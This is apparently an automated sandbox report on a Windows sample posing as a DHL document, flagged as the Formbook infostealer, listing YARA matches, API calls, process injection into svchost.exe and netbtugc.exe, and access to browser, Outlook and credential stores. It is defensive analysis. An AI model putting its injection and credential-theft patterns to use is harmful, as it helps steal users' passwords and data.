            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0081001C
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0083CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0083CABC

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: This is a third-party compiled AutoIt script.0_2_007B3B3A
            Source: DHL 40312052024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: DHL 40312052024.exe, 00000000.00000000.2014630945.0000000000864000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_019dc59f-1
            Source: DHL 40312052024.exe, 00000000.00000000.2014630945.0000000000864000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_935dc8e3-b
            Source: DHL 40312052024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fc301743-4
            Source: DHL 40312052024.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_66aeed68-a
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B60 NtClose,LdrInitializeThunk,2_2_03372B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03372DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03372C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033735C0 NtCreateMutant,LdrInitializeThunk,2_2_033735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374340 NtSetContextThread,2_2_03374340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374650 NtSuspendThread,2_2_03374650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BA0 NtEnumerateValueKey,2_2_03372BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B80 NtQueryInformationFile,2_2_03372B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BF0 NtAllocateVirtualMemory,2_2_03372BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BE0 NtQueryValueKey,2_2_03372BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AB0 NtWaitForSingleObject,2_2_03372AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AF0 NtWriteFile,2_2_03372AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AD0 NtReadFile,2_2_03372AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F30 NtCreateSection,2_2_03372F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F60 NtCreateProcessEx,2_2_03372F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FB0 NtResumeThread,2_2_03372FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03373010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03373090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_033739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03373D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03373D70 NtOpenThread
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: 0_2_0081A1EF: GetFullPathNameW, __swprintf, CreateDirectoryW, CreateFileW, _memset, _wcsncpy, DeviceIoControl, CloseHandle, RemoveDirectoryW, CloseHandle
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: 0_2_00808310 _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: 0_2_008151BD ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0332B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 033BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03375130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 033AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03387E54 appears 102 times
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: String function: 007D8900 appears 41 times
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: String function: 007B7DE1 appears 36 times
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: String function: 007D0AE3 appears 70 times
            Source: DHL 40312052024.exe, 00000000.00000003.2052710266.0000000003E0D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DHL 40312052024.exe
            Source: DHL 40312052024.exe, 00000000.00000003.2052257786.0000000003C63000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DHL 40312052024.exe
            Source: DHL 40312052024.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@15/7
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: 0_2_0081A06A GetLastError, FormatMessageW
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: 0_2_008081CB AdjustTokenPrivileges, CloseHandle
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: 0_2_008087E1 LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: 0_2_0081B3FB SetErrorMode, GetDiskFreeSpaceExW, SetErrorMode
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: 0_2_0082EE0D CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CloseHandle
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: 0_2_0081C397 CoInitialize, CoCreateInstance, CoUninitialize
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: 0_2_007B4E89 CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | File created: C:\Users\user\AppData\Local\Temp\aut10B2.tmp
            Source: DHL 40312052024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000004.00000003.2388396371.0000000002942000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.0000000002942000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.000000000296E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2388283618.0000000002921000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.000000000294A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DHL 40312052024.exe | ReversingLabs: Detection: 47%
            Source: DHL 40312052024.exe | Virustotal: Detection: 41%
            Source: unknown | Process created: C:\Users\user\Desktop\DHL 40312052024.exe "C:\Users\user\Desktop\DHL 40312052024.exe"
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 40312052024.exe"
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\DHL 40312052024.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: DHL 40312052024.exe | Static file information: File size 1202688 > 1048576
            Source: DHL 40312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: DHL 40312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: DHL 40312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: DHL 40312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: DHL 40312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: DHL 40312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: DHL 40312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000000.2120500383.00000000005AE000.00000002.00000001.01000000.00000004.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000000.2278282090.00000000005AE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 40312052024.exe, 00000000.00000003.2052018361.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 40312052024.exe, 00000000.00000003.2050921720.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106405513.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104672703.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2204504702.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2201825433.0000000002AB8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002E10000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 40312052024.exe, 00000000.00000003.2052018361.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 40312052024.exe, 00000000.00000003.2050921720.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2106405513.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104672703.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2204504702.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2201825433.0000000002AB8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002E10000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2170477605.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201616955.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000003.2140528861.0000000000B4B000.00000004.00000001.00020000.00000000.sdmp
